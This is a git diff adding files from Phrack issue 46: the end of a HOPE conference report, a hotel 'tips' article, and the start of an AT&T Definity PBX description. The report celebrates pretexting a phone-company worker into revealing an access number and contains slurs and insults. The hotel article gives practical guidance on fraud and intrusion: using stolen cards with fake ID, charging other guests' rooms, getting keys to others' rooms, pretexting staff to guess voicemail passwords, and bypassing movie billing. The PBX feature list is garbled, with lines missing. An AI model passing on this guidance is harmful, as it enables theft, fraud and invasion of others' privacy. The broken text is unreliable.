+Management  hatred:  "I'm sitting here at 3PM working while  man
+agement is on their yachts.  Can you tell me . . .?"
+
+Giveaways: "Did you know that so and so is having an affair  with 
+so and so?  It's true, I swear.  By the way, can you tell me  how 
+to . . ."
+
+Empathy:  "I'm new, haven't been to the training course and  they 
+expect me to figure this out all by myself.  It's not fair."
+
+Thick Accent: "Hi.  Dees computes haf big no wurk. Eet no makedah 
+passurt. Cunu help?  Ah, tanku." Good for a quick exchange and  a 
+quick  good-bye.  Carefully done, people want you off  the  phone 
+quickly.
+
+Billsf,  the  almost 40 American phreak who now  calls  Amsterdam 
+home  was  wiring  up Supernigger's real  live  demonstration  of 
+social  engineering against Sprint. A dial tone came over the  PA 
+system followed by the pulses to 411.
+
+"Directory  Assistance," the operator's male voice  was  squeezed 
+into a mere three kilohertz bandwidth.
+
+Suddenly, to the immense pleasure of the audience, an  ear-split
+ting screech a thousand times louder than finger nails on a chalk 
+board not only belched across the sound system but caused instant 
+bleeding  in  the ears of the innocent but now deaf  operator.  .  
+Billsf   sheepishly  grinned.   "Just trying to wire  up  a  mute 
+button."  
+
+Three hundred people in unison responded: "It doesn't work."   No 
+shit.
+
+While  Billsf feverishly worked to regain his reputation,  Super
+nigger  explained  what he was going to do. The  phone  companies 
+have a service, ostensibly for internal use, called a C/NA.  Sort 
+of a reverse directory when you have the number but want to  know 
+who  the  number  belongs to and from whence it  comes.  You  can 
+understand  that this is not the sort of feature that  the  phone 
+company  wants to have in the hands of a generation of  kids  who 
+are  so  apathetic that they don't even know they  don't  give  a 
+shit.   Nonetheless, the access to this capability is through  an 
+800 number and a PIN.
+
+Supernigger  was going to show us how to acquire such  privileged 
+information.   Live.  "When you get some phone company person  as 
+dumb  as a bolt on the other end, and you know a few buzz  words. 
+you convince them that it is in their best interest and that they 
+are supposed to give you the information."
+
+"I've never  done this in front of an audience before, so give me 
+three  tries," he explained to an anxiously foaming at the  mouth 
+crowd.  No one took a cheap pot shot at him: tacit acceptance  of 
+his rules.
+
+Ring. Ring. 
+
+"Operations.  Mary."
+
+"Mary.  Hi, this is Don Brewer in social engineering over at CIS, 
+how's it going?"  Defuse.
+
+"Oh, fine. I guess."
+
+"I know, I hate working Sundays.  Been busy?"
+
+"Nah, no more.  Pretty calm.  How can I help you?"
+
+"I'm  doing a verification and I got systems down.  I  just  need 
+the C/NA.  You got it handy?"  Long pause.
+
+"Sure,  lemme  look. Ah, it's 313.424.0900."  700  notebooks  ap
+peared  out  of  nowhere, accompanied by the sound  of  700  pens 
+writing down a now-public phone number.
+
+"Got  it.  Thanks."  The audience is gasping  at  the  stunningly 
+stupid  gullibility  of  Mary.  But quiet was  essential  to  the 
+mission. 
+
+"Here's  the PIN number while we're at it." Double  gasp.   She's 
+offering the supposedly super secret and secure PIN number?   Was 
+this event legal?  Had Supernigger gone over the line?
+
+"No, CIS just came up.  Thanks anyway."
+
+"Sure you don't need it?"
+
+"Yeah.  Thanks.  Bye."  Click. No need to press the  issue.   PIN 
+access  might  be worth a close look from the  next  computer  DA 
+wanna-be.
+
+An  instant  shock wave of cacophonous approval  worked  its  way 
+throughout  the  750 seat ballroom in less than  2  microseconds.  
+Supernigger  had  just  successfully set himself  as  a  publicly 
+ordained  Cyber  Christ of Social Engineering.  His  white  robes 
+were on the way.  Almost a standing ovation lasted for the better 
+part  of a minute by everyone but the narcs in the  audience.   I 
+don't know if they were telco or Feds of whatever, but I do  know 
+that they were the stupidest narcs in the city of New York.  This 
+pair of dour thirty something Republicans had sphincters so tight 
+you could mine diamonds  out of their ass.  
+
+Arms  defiantly and defensively crossed, they were stupid  enough 
+to sit in the third row center aisle.  They never cracked a smile 
+at some of the most entertaining performances I have seen outside 
+of  the giant sucking sound that emanates from Ross Perot's ears.
+
+Agree or disagree with hacking and phreaking, this was funny  and 
+unrehearsed ad lib material.  Fools.  So, for fun, I crawled over 
+the legs of the front row and sat in the aisle, a bare eight feet 
+from the narcs.  Camera in hand I extended the 3000mm  tele-photo 
+lens  which can distinguish the color of a  mosquitoes  underwear 
+from a kilometer and pointed it in their exact direction.   Their 
+childhood  acne scars appeared the depth of the Marianna  Trench.  
+Click,  and the flash went off into their eyes, which at  such  a 
+short  distance should have caused instant blindness.  But  noth
+ing.  No reaction.  Nada. Cold as ice.  Rather disappointing, but 
+now  we know that almost human looking narc-bots have  been  per
+fected and are being beta tested at hacker cons. 
+
+Emmanuel Goldstein is very funny.  Maybe that's why Ed Markey and 
+he  get  along so well.  His low key voice rings  of  a  gentler, 
+kinder  sarcasm but has a youthful charm despite that he  is  30-
+something himself. 
+
+"Sometimes  you  have to call back.  Sometimes you have  to  call 
+over  and  over to get what you want.  You have to keep  in  mind 
+that  the people at the other end of the phone are generally  not 
+as  intelligent  as a powered down computer."   He  proceeded  to 
+prove the point.
+
+Ring ring,
+
+"Directory Assistance."
+
+"Hi."
+
+"Hi."
+
+"Hi."
+
+"Can I help you."
+
+"Yes."
+
+Pause.
+
+"Hello?"
+
+"Hi."
+
+"Hi."
+
+"Can I help you.:
+
+"OK."  
+
+Shhhhh.  Ssshhh.  Quiet.  Shhhh.  Too damned funny for words.
+
+"Directory Assistance."
+
+"I need some information."
+
+"How can I help you."
+
+"Is this where I get numbers?"
+
+"What number would you like?"
+
+"Information."
+
+"This is information."
+
+"You said directory assistance."
+
+"This is."
+
+"But I need information."
+
+"What information do you need?"
+
+"For information."
+
+"This is information."
+
+"What's the number?"
+
+"For what?"
+
+"Information."
+
+"This is directory assistance."
+
+"I need the number for information."
+
+Pause.  Pause.
+
+"What number do you want?"
+
+"For information."
+
+Pause.  Guffaws, some stifled, some less so.  Funny stuff. 
+
+"Hold on please."
+
+Pause.
+
+"Supervisor.  May I help you?"
+
+"Hi."
+
+"Hi."
+
+Pause.
+
+"Can I help you?"
+
+"I need the number for information."
+
+"This is directory assistance."
+
+"Hi."
+
+"Hi."
+
+"What's the number for information?"
+
+"This is information."
+
+"What about directory assistance?"
+
+"This is directory assistance."
+
+"But I need information."
+
+"This is information."
+
+"Oh, OK. What's the number for information?"
+
+Pause.
+
+"Ah 411."
+
+"That's it?"
+
+"No. 555.1212 works too."
+
+"So there's two numbers for information?"
+
+"Yes."
+
+"Which  one  is better?"   How this audience kept  its  cool  was 
+beyond me.  Me and my compatriots were beside ourselves.
+
+Pause.
+
+"Neither."
+
+"Then why are there two?"
+
+Pause.
+
+"I don't know."
+
+"OK.  So I can use 411 or 555.1212."
+
+"That's right."
+
+"And which one should I use?"
+
+Pause.
+
+"411 is faster."  Huge guffaws.  Ssshhhh.  Ssshhhh..
+
+"Oh. What about the ones?"
+
+"Ones?"
+
+"The ones."
+
+"Which ones?"
+
+"The ones at the front of the number."
+
+"Oh, those ones.  You don't need ones.  Just 411 or 555.1212.."
+
+"My friends say they get to use ones."  Big laugh.  Shhhhhh.
+
+"That's only for long distance."
+
+"To where?"  How does he keep a straight face?
+
+Pause.
+
+"If you wanted 914 information you'd use a one."
+
+"If I wanted to go where?"
+
+"To 914?"
+
+"Where's that?"
+
+"Westchester."
+
+"Oh, Westchester.  I have friends there."
+
+Pause.
+
+"Hello?"
+
+"Yes?"
+
+"So I use ones?"
+
+"Yes.  A one for the 914 area."
+
+"How?"
+
+Pause.
+
+"Put a one before the number."
+
+"Like 1914. Right?"
+
+"1914.555.1212."
+
+"All of those numbers?"
+
+"Yes."
+
+"That's three ones."
+
+"That's the area code."
+
+"I've  heard about those.  They confuse me."   Rumbling  chuckles 
+and laughs throughout the hall. 
+
+Pause.
+
+She  slowly and carefully explained what an area code is  to  the 
+howlingly irreverent amusement of the entire crowd except for the 
+fool narcs. 
+
+"Thanks.  So I can call information and get a number?"
+
+"That's right."
+
+"And there's two numbers I can use?"
+
+"Yes."
+
+"So I got two numbers on one call?"
+
+"Yeah . . ."
+
+"Wow.  Thanks.  Have a nice day."
+
+* * * * * 
+
+Comments heard around HOPE.
+
+Rop Gongrijjp, Hacktic:  "The local phone companies use their own 
+social  engineers  when they can't get their own people  to  tell 
+them what they need to know."
+
+Sprint  is  using what they consider to be  the  greatest  access 
+mechanism since the guillotine.  For all of us road warriors  out 
+there  who are forever needing long distance voice  service  from 
+the Whattownisthis, USA airport, Sprint thinks they have a better 
+mousetrap.  No more messing finger entry.  No more pass-codes  or 
+PIN's.  
+
+I  remember at the Washington National Airport last summer I  was 
+using my Cable and Wireless long distance access card and entered 
+the PIN and to my surprise, an automated voice came on and  said, 
+"Sorry,  you entered your PIN with the wrong finger.  Please  try 
+again."
+
+Sprint says they've solved this thorny cumbersome problem with  a 
+service  called  "The Voice Fone Card".   Instead  of  memorizing 
+another  64 digit long PIN, you just speak into the phone:   "Hi, 
+it's me.  Give me dial tone or give me death."  The voice  recog
+nition  circuits  masturbate  for a while to  determine  if  it's 
+really you or not.   
+
+Good idea.  But according to Strat, not a good execution.   Strat 
+found  that someone performing a poor imitation of his voice  was 
+enough  to break through the front door with ease.  Even  a  poor 
+tape  recording  played back over a cheap  cassette  speaker  was 
+sufficient to get through Sprint's new whiz-banger ID system.  
+
+Strat  laughed that Sprint officials said in defense, "We  didn't 
+say it was secure: just convenient."  
+
+Smart.  Oh, so smart.
+
+* * * * * 
+
+"If  my  generation of the late 60's and early 70's had  had  the 
+same  technology  you guys have there never would  have  been  an 
+80's."  This was how I opened my portion of the author's panel.
+
+The authors panel was meant to give HOPE hackers insight into how 
+they  are  perceived  from the so-called outside.   I  think  the 
+session  achieved that well, and I understand the videos will  be 
+available soon.  
+
+The question of electronic transvestites on AOL came up to every
+one's enjoyment, and all of us on the panel retorted with a  big, 
+"So  what?"  If you have cyber-sex with someone on the  'Net  and 
+enjoy  it,  what the hell's the difference?   Uncomfortable  butt 
+shifting  on chairs echoed how the largely male  audience  likely 
+feels about male-male sex regardless of distance. 
+
+"Imagine,"  I  kinda said, "that is a few years you have  a  body 
+suit  which  not only can duplicate your moves exactly,  but  can 
+touch you in surprisingly private ways when your suit is connect
+ed  to another.  In this VR world, you select the gorgeous  woman 
+of choice to virtually occupy the other suit, and then the two of 
+you  go  for it.  How do you react when you  discover  that  like 
+Lola, 'I know what I am, and what I am is a man and so's  Lola.'"   
+Muted  acknowledgment  that  unisex may come  to  mean  something 
+entirely different in the not too distant future.
+
+"Ooh, ooh, please call on me."  I don't mean to be insulting, but 
+purely  for identification purposes, the woman behind  the  voice 
+bordered  on five foot four and four hundred pounds. Her  bathtub 
+had stretch marks.
+
+I never called on her but that didn't stop her.
+
+"I want to know what you think of how the democratization of  the 
+internet  is affected by the differences between  the  government 
+and  the  people who think that freedom of the net  is  the  most 
+important thing and that government is fucked but for freedom  to 
+be  free  you have to have the democracy behind you  which  means 
+that the people and the government need to, I mean, you know, and 
+get  along  but the sub culture of the hackers doesn't  help  the 
+government but hackers are doing their thing which means that the 
+democracy will not work , now I know that people are laughing and 
+giggling  (which they were in waves) but I'm serious  about  this 
+and I know that I have a bad case of hypomania but the medication 
+is working so it's not a bad as it could be.  What do you think?"
+
+I  leaned forward into the microphone and gave the only  possible 
+answer.   "I  dunno.  Next."  The thunderous  round  of  applause 
+which  followed my in-depth response certainly suggested that  my 
+answer was correct.  Not politically, not technically, but  anar
+chistically. Flexibility counts.
+
+* * * * * 
+
+HOPE  was attended by around one thousands folks, and  the  Hotel 
+Filthadelphia still stands.  (Aw shucks.)  
+
+My single biggest complaint was not that the schedules slipped by 
+an  hour or two or three; sessions at conferences like this  keep 
+going  if  the  audience is into them and they are  found  to  be 
+educational and productive.  So an hour session can run into  two 
+if  the  material and presentations fit the mood.   In  theory  a 
+boring session could find itself kama kazi'd into early melt-down 
+if  you have the monotone bean counter from hell  explaining  the 
+distributed  statistical means of aggregate synthetic  transverse 
+digitization   in  composite  analogous  integral   fruminations.  
+(Yeah, this audience would buy off on that in a hot minute.)  But 
+there were not any bad sessions.  The single track plenary  style 
+attracted  hundred  of  hackers for every  event.   Emmanuel  and 
+friends picked their panels and speakers well.  When dealing with 
+sponge-like minds who want to soak up all they can learn, even in 
+somewhat of a party atmosphere, the response is bound to be good.  
+
+My single biggest complaint was the registration nightmare.   I'd 
+rather go the DMV and stand in line there than get tagged by  the 
+seemingly  infinite lines at HOPE.  At DefCon early  registration 
+was encouraged and the sign up verification kept simple.
+
+For some reason I cannot thoroughly (or even partially) fathom, a 
+two  step  procedure was chosen.  Upon entering, and  before  the 
+door narcs would let anyone in, each attendee  had to be assigned 
+a piece of red cardboard with a number on it.  For the first  day 
+you could enter the 'exhibits' and auditorium without  challenge.  
+But by Day 2 one was expected to wait in line for the better part 
+of  a week, have a digital picture taken on a computer tied to  a 
+CCD  camera,  and then receive a legitimate HOPE  photo-ID  card.  
+What  a  mess. I don't have to beat them up on it too  bad;  they 
+know the whole scheme was rotten to the core.  
+
+I waited till near  the end of Day 2 when the lines were gone and 
+the  show was over.  That's when I got my Photo ID card.  I  used 
+the MIB's photo ID card the rest of the time.
+
+HOPE  was a lot of fun and I was sorry to see it end, but as  all 
+experiences, there is a certain amount of letdown.  After a great 
+vacation, or summer camp, or a cruise, or maybe even after  Wood
+stock, a tear welts up.  Now I didn't cry that HOPE was over, but 
+an  intense 48 hours with hackers is definitely not your  average 
+computer  security convention that only rolls from 9AM  to  Happy 
+Hour.   At a hacker conference, you snooze, you lose.  You  never 
+know  what is going to happen next - so much is  spontaneous  and 
+unplanned  - and it generally is highly educational,  informative 
+and entertaining.
+
+Computer  security folks:  you missed an event  worth  attending.  
+You  missed some very funny entertainment.  You missed some  fine 
+young people dressed in some fine garb.  You missed the chance to 
+meet with your perceived 'enemy'.  You missed the opportunity  to 
+get  inside  the heads of the generation that  knows  more  about 
+keyboards  than  Huck  Finning in suburbia.   You  really  missed 
+something,  and  you should join Robert MIB Steele and I  at  the 
+next hacker conference.              
+
+* * * * *
+
+If only I had known.
+  
+If  only I had known that tornadoes had been dancing up and  down 
+5th  avenue  I would have stayed at the Hotel  Filthadelphia  for 
+another night.  
+
+La  Guardia airport was closed.  Flights were up to 6  hours  de
+layed if not out and out canceled.  Thousands of stranded travel
+ers hunkered down for the night.  If only I had known.  
+
+Wait, wait. Hours to wait.  And then, finally, a plane ready  and 
+willing to take off and swerve and dive between thunderbolts  and 
+twisters and set me on my way home.  
+
+My kids were bouncing out of the car windows when my wife  picked 
+me up at the airport somewhere in the vicinity of 1AM.  
+
+"Not  too  late are you dear?"  Sweet Southern  Sarcasm  from  my 
+Sweet Southern Wife.  
+
+"Don't  blame me," I said in all seriousness.  "It was the  hack
+ers.  They caused the whole thing."
+
+* * * * * 
+
+Notice: This article is free, and the author encourages responsi
+ble  widespread electronic distribution of the document in  full, 
+not  piecemeal.  No fees may be charged for its use.    For  hard 
+copy print rights, please contact the author and I'll make you an 
+offer  you can't refuse.  The author retains full  copyrights  to 
+the contents and the term Cyber-Christ.
+
+Winn is the author of "Terminal Compromise",  a  novel  detailing 
+a  fictionalized account of a computer war waged on   the  United 
+States.   After selling well as a book-store-book, Terminal  Com
+promise  was placed on the Global Network as the  world's   first 
+Novel-on-the-Net Shareware and has become an underground classic.  
+(Gopher TERMCOMP.ZIP)  
+
+His  new  non-fiction book, "Information Warfare:  Chaos  on  the 
+Electronic  Superhighway" is  a compelling, non-technical  analy
+sis   of personal privacy, economic and industrial espionage  and 
+national  security.   He calls for the creation  of   a  National 
+Information Policy,  a  Constitution  in Cyberspace and an  Elec
+tronic Bill of Rights.
+
+He   may  be reached at INTER.PACT,  11511  Pine  St.,  Seminole, 
+FL.  34642. 813-393-6600, fax 813-393-6361,  E-Mail:
+P00506@psilink.com.
+
diff --git a/phrack46/24.txt b/phrack46/24.txt
new file mode 100644
index 0000000..6268cee
--- /dev/null
+++ b/phrack46/24.txt
@@ -0,0 +1,238 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 24 of 28
+
+****************************************************************************
+
+
+The ABCs of better  H O T E L   Staying ...
+
+                                       ...  by SevenUp (sec@escape.com)
+
+This ARTICLE will give you some information on how to experience
+a cheaper, safer, and more comfortable stay at your next hotel visit.
+Always keep in mind that the staff is taught to make your stay
+as pleasant as possible and fulfil most of your wishes. So it is often
+a matter of social engineering to reach your goal.
+
+BUSINESS CENTRES
+Many good hotels offer business centres. Some business centres just offer
+"typing service" at high rates, others provide a PC you can use for free.
+Usually it is a 286 or older, but it should give you the opportunity
+to copy warez, write your latest article for Phrack or even connect your
+pocket modem and login to the -> Internet.
+
+CREDIT CARDS
+If you have your own card and don't mind paying for the room - great!
+Just use it when you check in - most places require you to have a credit
+card or won't let you use the phone or won't even let you in.
+You want to use someone else's card? Be careful! Don't use a stolen
+card when you check in, or you won't have a safe sleep, fearing that they
+could come and get you. You would be safer if you tell them upon check in
+that you misplaces your card and don't need to make long distance calls,
+and just want to pay with it in the end. This doesn't work always, but
+sometimes. You also need a faked ID upon check in with the same name as
+the cardholder.
+
+But overall, using a faked Credit Card in a hotel is one of the easiest ways
+to get busted.
+
+DIALUPS
+Many hotels have dialins for their reservation system. Novells are quite
+popular. Some hotels also use PC based UNIXes (old System V's mostly)
+that are often unprotected - no passwords on the root account or even
+giving you a shell prompt when you call the dialup. Most of them are 7e1
+at slow speeds. I won't say more about reservation systems here.
+
+EATING & DANCING
+Many hotels have good and relatively expensive restaurants and discos.
+They just require you to sign the check with a room number and full name.
+If you know of a guest that is checked in and has secured his account with
+a credit card who just checked in, just use his name and room number -
+this is probably the biggest lack of security in a hotel.
+
+Also if you don't stay at the hotel but want to go to their disco at night,
+pretend to be a guest to get in free and save cover charges. They usually
+believe you.
+
+FUCKING
+You've read right, hotels are favorite places to make love. No matter
+if you bring your IRC date here, pick up a hooker or stay alone and
+watch the in-house porn movies. Since many hotels pride themselves in
+having as much staff as guests, the question is how to get the cute
+waitresses and maids into your bed. If anyone has experience making
+them willing without much financial and physical effort, drop me a
+mail and I will include it in the next list.
+
+GET ALL
+Some people love to take all movable parts from the room before checking
+out. The question is what to take and what not.
+
+The easiest things to take are soaps, shampoo, lotions and Kleenex from
+the bathroom, since they will be replaced every morning without problems.
+If you want a bathrobe (usually most expensive item), hide it in your
+suitcase immediately after check in and then complain that there was just
+one robe in your room. They will bring you a new one immediately. If you
+take one when you leave the hotel, they will notice and most likely
+charge you $100 in your credit card. If you want a bath towel, also don't
+wait until the end of your stay, but hide it some days earlier. If anyone
+should ask about it, just tell him that you left it at the pool.
+Taking magazines from your room is usually no problem, but stay away
+from removing the TV or blankets!
+
+HYATT GOLD PASSPORT
+If you want to check in at a Hyatt, get yourself their Gold Pass before.
+It is free of charge and will get you free Orange Juice, Coffee and a
+newspaper in the morning, and also a bigger room.
+
+INTERNET
+So you are at a hotel in a new city and want to get on the Internet?
+There are usually 2 ways: Using a computer and a modem from your hotel room
+and calling a dialup, or walking to a local university and logging in from
+there.
+
+If you bring your laptop with built-in modem, find the dialup in the
+Internet Dialup list in this issue of Phrack, get an account on the host
+and can make free local calls from your room, the first choice is probably
+the best one.
+
+But if you don't have your own account at a local school and want to
+stay legit, it is often useful to walk to a computer lab in that school
+and check out their computers. Many school around the world have PC's
+in their labs which let you do a telnet throughout the world without
+needing any account or password, or ID to enter the school. You can find
+them in Hong Kong, New York, Munich and many other major cities; but usually
+they are unknown to the public or are likely to be closed down (similar to the
+vending machines, see -> SEVENUP).
+
+JACKING OFF
+See -> Fucking.
+
+KEY
+There are plenty of different types of room keys. Some hotels still use
+old-fashioned standard keys, but most use programmable keys (plastic cards
+with "holes" or magnetic stripes, or even the pretty modern metal keys
+in key-shape, which allow programming of their magnetic fields. These
+programmable keys will always be reprogrammed if a guest checks out.
+On the other hand, if you go to the reception and claim that you lost
+your key, they will always program a spare key for you. Sometimes they
+ask you for your birthday, sometimes for your ID (just tell them you
+left it in your room). This way you could easily get into someone else's
+room.
+
+LIGHT
+Some hotels have quite fancy light systems. If the light won't shine,
+there is often a box in the entrance where you have to enter your key
+(or some paper) to activate the main power. This should help saving
+energy while you are gone, but sometimes even the air condition will
+turn off, so you have to fool the box with a paper or spare key.
+Some systems will turn on certain lights just when you insert the key
+into the door and open it. This is quite unfortunate if your roommate
+sleeps while you go cruising and clubbing at night. When you return,
+the light will shine bright and wake him up. The only thing that helps
+is unscrewing the light bulbs.
+
+MOVIES & TV
+I bet many of you will first turn on the TV after entering the room.
+Some people just stay at hotels that offer HBO in their rooms.
+Before playing with the remote, read the papers above the TV carefully,
+because some channels might show in-house movies that are being charged
+automatically without any warning. Typical rates are US $6-9 per movie.
+Of course you don't want to pay that much, nor do I.
+
+Here are the 3 big S' of movie watching:
+     Spectravision, Sex movies and Social Engineering.
+
+Spectravision is one of the most popular systems. It usually allows you
+to watch 5 minutes (sometimes 2) of each movie per day free, enough for
+some people to come. There are usually a bunch of BNC cables from the
+wall to your Spectravision box and to your TV. One of the cables delivers
+the program, the other assures billing. Use your fantasy and try replacing
+the "billing cable" in the wall! Generally it can also be useful to use
+a standard cable decoder (cablebox) to decode the pay channels. Just bring
+one along and if you are lucky, you can watch the movies easily.
+
+If all your technical expertise fails, there is still one way of watching
+movies for free: Social Engineering. Just watch the movies of your choice
+and then complain to the reception that you had trouble with the TV,
+that the Spectravision box or remote control broke, or that you caught
+the maid watching movies in your room. If you cry a lot, they will usually
+be nice and remove the movies from your bill.
+
+PHONE CALLS
+Be careful before making any phone calls from your room. Many hotels
+charge you up to $3 for 800 numbers and log all your touch tones (and
+calling codez!). You can't be sure who will view the logs and abuse your
+calling card. Also there are often high surcharges for long distance calls,
+up to 40% on top of AT&T's operator connected charges. There are also hotels
+that charge a minimum charge per call (up to $5), even if you just talked
+for 10 seconds long distance. On the other side, some hotels offer free local
+and 800 calls. Just make sure and read all papers in the room and contact
+the reception. I also had operators telling me lower rates than the ones that
+showed up on my bill, so be careful.
+
+RACK RATE
+This is the highest possible rate for a room, and the rate that is officially
+displayed at the reception. You should never pay that rate. If you say you
+are with a company they will give you a discount of at least 10% (corporate
+rate). Some hotels even give qualified people and companies discounts of
+25% - 50% on the rack rate. When you wonder if you pay too much for your
+room or think you got a great rate, send me a mail, because I try to keep
+a database about cheapest prices for selected hotels.
+
+SEVENUP, Coke, Pepsi & Rootbeer:
+You are staying at a five-star hotel. You are thirsty. Your room has
+a minibar, but the cheapest soda is $4.95. The next supermarket or gas
+station is 20 miles away. But you need a Coke. What to do now?
+
+TRY finding the gangways where the employers work, live and eat!
+About every bigger hotel has a kitchen for employees. They also have
+a vending machine hidden somewhere, with sodas for just 60 cents.
+
+When strolling through the restricted area, just walk straight, slowly
+and self confident. If someone asks you what you are doing, tell them:
+a) you are an undercover agent for the IRS and they should get lost.
+b) you are looking for the vending machine. (telling the truth openly
+   with a broad smile can be more successful than you think!)
+c) you are a new employee and ask her to show you around
+
+Also notice the signs and posters in most restricted areas, telling
+the personnel to be "enthusiastic, punctual, generous to the guest..."
+Quote these phrases when an employer behaves nasty towards you.
+
+UPGRADES
+After first going into your room and checking it out, go back to
+the reception and complain that the bed is too small, the street noise
+is too loud, the view is too poor, etc. Quite often they will give you
+a nicer and bigger room on their executive floor! See also -> Hyatt
+Gold Passport.
+
+VOICE MAIL
+Many good hotels offer voice mail to their guests. The most popular
+system is Meridian Mail. Some hotels have an own dialup for the voicemail,
+but mostly the hotel just lets you access it through the main PBX operator.
+If you are unlucky you have to wait 5 rings at a number before the
+Voice Mail answers.
+
+Most guests don't use Voice Mail. The few that do also keep the default
+password, which is often the room number or the birthday of the guest.
+One way to get the birthday is call up front desk, tell them you are
+with "Mommy's Birthday Cakes Delivery" and have a cake for John Smith.
+Ask them to check birthday's of all John Smith's etc. Of course there
+are more ways, just use your social engineering fantasy!
+
+WHERE TO GO?
+It is pretty hard to recommend chains in general. But I had quite
+good experience with Hilton, Hyatt (try getting a room on the Regency
+floor), Holiday Inn (sometimes really cheap prices and good standard),
+Shangri-La (best hotels in Asia) and Marriott (usually nice service).
+I had less good experience with Sheraton (less discounts), Peninsula,
+Regent & Four Seasons (all a bit overpriced and not so modern). But
+there are always exceptions, so tell me about your experience!
+
+
+I hope some of these tips might be useful for you. Stay tuned and wait
+for a new issue of travel tips, next time about Airlines!
+
+
+(c)opyright 1994 by the author. Publication outside of Phrack forbidden.
diff --git a/phrack46/25.txt b/phrack46/25.txt
new file mode 100644
index 0000000..130a4e7
--- /dev/null
+++ b/phrack46/25.txt
@@ -0,0 +1,309 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 25 of 28
+
+****************************************************************************
+
+
+                       ================================
+                          AT&T Definity System 75/85
+                             Communications System
+                          Description & Configuration
+                       ================================
+                              Written By: erudite
+                              (armitage@dhp.com)
+=====
+Intro
+=====
+
+Let me introduce you to the AT&T Definity System 75/85.  This communications
+system is a product of the merging of the AT&T System 75 and System 85
+architectures.  The name Definity came from the two words "definitive" and
+"infinity".
+
+Let me also tell you that there are many different communications systems
+out there. (Merlins, AT&Ts) Many many many, I couldn't name them all, but
+the AT&T systems are nice.  I enjoy working with them, and I hope you enjoy
+this text file.
+
+This System is an advanced business communications system.  A Digital
+Communications Protocol (DCP) allows data communication through data
+terminal equipment connected to the digital switch.  This allows the
+system to handle data and voice communications simultaneously.
+
+The System can handle up to 1600 lines that supports all digital, hybrid,
+and analog terminals and equipment.  Up to 400 trunks, and up to 400
+Automatic Call Distribution (ACD) Agents.  The Data switching capacity is up
+to 800 digital data endpoints, and 160 integrated and combined pooled modem
+facilities.
+
+  ~ 510D Personal Terminal or 515-Type Business Communications Terminal
+  ~ 7404D Terminals
+  ~ 7406D or 7407D Equipped with optional Data Module Base
+  ~ Asynchronous Data Units (ADU) (DCE type device that has rs232c interface)
+  ~ Digital Terminal Data Modules
+  ~ 3270 Data Modules
+  ~ Internal Data Channels
+  ~ Trunk Data Modules (Modular)
+  ~ Processor Data Modules (Modular)
+
+==========
+Networking
+==========
+
+The Processor Port Network (PPN) always provides the switch processing
+element (SPE) and port circuits.  An Expansion Port Network (EPN) is
+available to increase line size of any system by allowing you to add
+additional port circuits.  The EPN connects to the PPN over a fiber
+optic cable that may be up to 1.86 miles remotely situated.  It may also
+by located adjacent to the PPN.
+
+This System may be arranged stand-alone or you can integrate it into a
+private network.  You can form these types of Networks:
+        ~ Tandem Tie Trunk Network (TTTN)
+        ~ Electronic Tandem Network (ETN)
+        ~ Main/Satellite Configuration
+        ~ Distributed Communications System (DCS)
+        ~ Centralized Attendant Service (CAS)
+
+An Integrated Services Digital Network Primary Rate Interface (ISDN-PRI)
+makes it possible for the Definity System to access various private and
+public network services.  With ISDN-PRI the you can access these services:
+        ~ Call by Call Service Selection
+        ~ Private Network Services
+        ~ Information Forwarding
+        ~ Call Identification Display
+          - Connected Number Display
+          - Connected Party Name Display
+          - Calling and Called Number Record Display
+          - Calling and Called Party Name Display
+
+=============
+Configuration
+=============
+
+The Actual System is encased in a pair of "cabinets" which have a fiber
+optic link between them.  It is also common to have a stack of about three
+"cabinets" of a smaller size, for different models.
+
+Shown here is a typical multi-carrier system with a Processor Port Network
+(PPN) cabinet and Expansion Port Network (EPN) cabinet.
+
+  attendant          outside trunks   _____ outside private line
+   consoles            and lines    /        data transmission equipment or
+      \                      \    /          analog switched network
+        \      fiber optic    |  |
+         |      connection    |  |         __ business communication
+        -+---------/~\--------+--+       /    terminals
+       |   AT&T    | |   AT&T    |      |
+       | DEFINITY  | | DEFINITY  +------'                      ___data
+    ---+  SYSTEM   | |  SYSTEM   +--------<>------[audix]    /    terminals
+  /    |  75/85    | |  75/85    |   modular data          /
+ |     |___________| |__________+|     processor     ____ |
+manager   |   |                 |                   |    +'optional host
+terminal  |   |                 +-------<>----------+    | computer or call
+         /    +-------[]-----+,                     |____| management system
+       /         asynchronous |
+  single line     data unit    \__ data
+voice terminals                    terminals
+
+
+===================
+  Voice and Data
+Management Features
+===================
+
+There are a lot of voice features and services, in fact, too many to list, I
+will do a run down on all the interesting and useful features and services.
+It has many Voice Management, Data Management, Network Services, System
+Management, Hospitality Services, and Call Management Services.
+
+  call attendant can use to operate the console more efficiently
+  both inside system users and remote callers to edit, receive, send,
+  write, and forward voice messages.
+  system.
+  it to the display console.
+  - Attendant Conference: Allows Attendant to construct a conference call
+  - Terminal Conference: Allows remote user to construct a conference call
+    without attendant assistance.
+  being interrupted by any of the systems overriding features, and denies
+  ability to gain access to, and or superimpose tones.
+  is issued by the administrator to a certain extension # for indication of
+  a dedicated private data extension.
+  the system to dial anyone else, such as the attendant console.
+  the following trunks and more.
+        ~ Voice Grade DS1 Tie Trunks
+        ~ Alternative Voice/Data (AVD) DS1 Tie Trunks
+        ~ Digital Multiplexed Interface (DMI) Tie Trunks
+        ~ Central Office (CO) Trunks
+        ~ ISDN-PRI Trunks
+        ~ Remote Access Trunks
+        ~ Wide Area Telecommunications Service (WATS) Trunks
+  features and functions that is used for maintenance testing.  Such as access
+  to system tones, access to specific trunks, etc.
+        Note: AT&T designed the Facility Test Calls Feature for testing
+              purposes only, and system maintenance.  When properly
+              administered, AT&T claims that the customer is responsible for
+              all security items, and secure system from unauthorized users,
+              and that all users should be aware of handling access codes.
+              AT&T claims they will take no responsibility for poor
+              administration.
+  it rings down if busy, or if it receives a dial timeout.
+  packet switched local area network that will link with mainframes,
+  workstations, personal computers, printers, terminals, storage devices,
+  and communication devices.
+  This interface allows connection of the system to an ISDN Network by means
+  of ISDN frame format called PRI.
+  branch has a Listed Directory Number (LDN).
+        ~ Common Control Switching Arrangement (CCSA)
+        ~ Electronic Tandem Network (ETN)
+        ~ Enhanced Private Switched Communications Service (EPSCS)
+        ~ Tandem Tie Trunk Network (TTTN)
+        ~ Software Defined Network (SDN)
+  doesn't want to take responsibility for anything that is abused with this
+  feature.
+  would come in handy.
+  others calls, again, AT&T does not want to take any legal fees on misuse
+  on this feature.
+  attendant's assistance.
+
+========
+Software
+========
+
